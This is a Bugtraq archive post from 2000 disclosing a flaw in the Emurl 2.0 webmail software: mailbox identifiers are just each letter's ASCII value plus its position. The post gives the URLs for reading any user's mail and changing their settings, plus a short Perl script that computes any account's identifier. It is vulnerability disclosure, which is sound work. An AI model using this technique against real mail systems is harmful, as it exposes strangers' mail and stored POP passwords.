Bugtraq mailing list archives

Vulnerability in EMURL-based e-mail providers

From: pbenoit () MAIL COM (Pierre Benoit)
Date: Mon, 15 May 2000 12:33:23 -0400


Affected Product: Emurl 2.0 For Windows NT 4.0 (possibly others)

Product information: Emurl is web-based email host developped by SeattleLab.
http://www1.seattlelab.com/emurl/

Impact: Users can access the mailbox's content of anybody on the system.
They can also steal their POP passwords since Emurl allows you to fetch your
POP email from more than one source.

Description:
After logging into my new mail account powered by the Emurl software, this
URL struck me:

http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123

I guess you all know where this is going. First, this identifier is based
solely on your account name. Therefore, if you create an account with the
same name on another site, you'll end up with the very same identifier.

Furthermore, this identifier can easily be determined since it  is "encoded"
using the ascii value of each character of the account's name and
incremented by its position.

In this example, my user ID would be PBenoit and my resulting identifier
would be 113100104114116111123.

p = 112 + 1 = 113
b = 98  + 2 = 100
e = 101 + 3 = 104
n = 110 + 4 = 114
o = 111 + 5 = 116
i = 105 + 6 = 111
t = 116 + 7 = 123

You could fetch the e-mails here

<A 
HREF="http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier">http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier</A>>

... and view/change the account's settings here

<A 
HREF="http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier">http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier</A>>

I threw a few lines of perl together to generate this.

print "Enter your ID: ";
$_=lc(<STDIN>); chomp;
print "Your identifier is: ";
@letters=split(//, $_);
for ($i = 0; $i < length($_); $i++) {
$mychar = ord($letters[$i])+$i+1;
if ($mychar < 100)
{ $mychar = (0).$mychar;}
print $mychar
}

Vendor status: SeattleLab is aware and the issue is addressed in their next
version.

______________________________________________
FREE Personalized Email at Mail.com
Sign up at http://www.mail.com/?sr=signup

Current thread:

ISSalert: Internet Security Systems Security Advisory: Microsoft IIS Remote Denial of Service Attack, (continued)
- - - ISSalert: Internet Security Systems Security Advisory: Microsoft IIS Remote Denial of Service Attack Warren Barrow (May 11)
    - Remote DoS attack in Internet Information Server 4.0 & 5.0 "Malformed Extension Data in URL" Vulnerability Ussr Labs (May 11)
    - Microsoft Security Bulletin (MS00-030) Microsoft Product Security (May 11)
    - IE Domain Confusion Vulnerability Foo Bar (May 11)
    - Overflow in Outlook Express 4.* - too long filenames with graphic format extension Ultor (May 12)
    - Eudora Sensitive to Long Filenames Ron Moritz (May 18)
    - IE Domain Confusion Vulnerability is an Email problem also Richard M. Smith (May 12)
    - Re: IE Domain Confusion Vulnerability doesn't matter much Marc Slemko (May 12)
    - Re: IE Domain Confusion Vulnerability doesn't matter much Richard M. Smith (May 15)
    - Vulnerability in CGI counter 4.0.7 by George Burgyan Howard M. Kash III (May 15)
    - Vulnerability in EMURL-based e-mail providers Pierre Benoit (May 15)
    - New Solaris root exploit for /usr/lib/lp/bin/netpr Anonymous (May 12)
    - Microsoft Security Bulletin (MS00-034) Microsoft Product Security (May 12)
    - Microsoft Office 2000 Advisory dildog (May 12)